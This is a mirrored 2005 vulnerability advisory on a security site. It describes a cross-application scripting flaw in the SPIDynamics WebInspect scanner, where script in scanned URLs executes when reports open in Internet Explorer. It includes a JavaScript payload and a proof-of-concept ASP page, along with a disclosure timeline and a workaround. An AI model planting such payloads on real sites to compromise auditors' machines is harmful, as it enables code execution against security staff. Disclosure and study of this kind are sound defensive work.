首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SPIDynamics WebInspect Cross-Application Scripting
来源:QQLan@yandex.ru 作者:QQLan 发布时间:2005-08-09  

SPIDynamics WebInspect Cross-Application Scripting (XAS)

Summary
SPIDynamics WebInspect is "powerful security assessment tool for Web application".SPIDynamics WebInspect has been found to be vulnerable to XAS that could lead to remote code execution.

Credit:
The information has been provided by QQLan.
The original article can be found at: http://www.security.nnov.ru/articles/xas/

Details
As many applications WebInspect uses external programs and Windows components for different purposes. It is very common to use COM object of Internet Explorer for render reports and displays data. WebInspect in not an exception.

When reports is generated, some parts of scanned site (for example URLs) are included into HTML file (file://C:\Program Files\SPIDynamics\WebInspect\Working\vulnerability.htm), which opens in IE. Because WebInspect doesn't properly normalize displayed data, part of URL or other data can be parsed by IE as DHTML, for example JavaScript, and leads to code execution on the computer where scanner is installed.

Analysis:
Successful exploitation allows remote attackers to execute arbitrary script code on the host, where scanner is installed with privileges of user who launch the scanner. Victim should scan site and openreport.

Typically scanner runs on administrator's or security auditor's box with a lot of interesting data. It possibly runs under high-privileged account.

Attacker should create specially crafted site with vulnerability to be displayed in report. "Vulnerable" URL should include script code. Example of such report is a "Hidden Form Value Vulnerability ID: 4727".

By default script is executed in Internet Security Zone of IE (not sure). But with little effort attacker can use predictable resource location to bypass restrictions of Internet Zone and execute script in "My Computer" security zone.

Example:
< script>window.open('file://C:\\Program Files\\SPIDynamics\\WebInspect\\Working\\vulnerability.htm')</script>

Attacker can use social engineering to install full featured application, for example new version of "SPIDynamics Reported ActiveX".

Proof of Concept:
Following ASP file can be used to reproduce vulnerability:
<*****************iisstart.asp***********************>

< HTML>< HEAD>< BODY>
<%
if request.querystring<>"" then
response.write request.querystring
end if
%>
< form action="script>/<script>window.open(%27file://C:\\Program Files\\SPIDynamics\\WebInspect\\Working\\vulnerability.htm%27)</script>" method=get> Please login:< br>
< input type=submit value="Login"><br> < input type=hidden name='hidden' value="Login">< br> </form>
< /BODY>< /HTML>

</*****************iisstart.asp***********************>

You should change default error page to iisstart.asp.

Disclosure Timeline:
04/15/2005 - Initial vendor notification
04/15/2005 - Initial vendor response

Workaround:
Disable Active Scripting in My Computer Zone: http://support.microsoft.com/default.aspx?scid=kb;en;833633.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quick'n Easy FTP Server DoS
·(MS05-038)Microsoft Internet E
·MySQL Eventum <= 1.5.5 logi
·(MS05-041)Microsoft Windows Re
·CA BrightStor ARCserve Backup
·(MS05-038)Microsoft Internet E
·Veritas Backup Exec For Window
·(MS05-039)Microsoft Windows Pl
·nbSMTP <= 0.99 util.c Clien
·Veritas Backup Exec Windows Ag
·Ethereal 10.x AFP Protocol Dis
·(MS05-039)Microsoft Windows 20
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved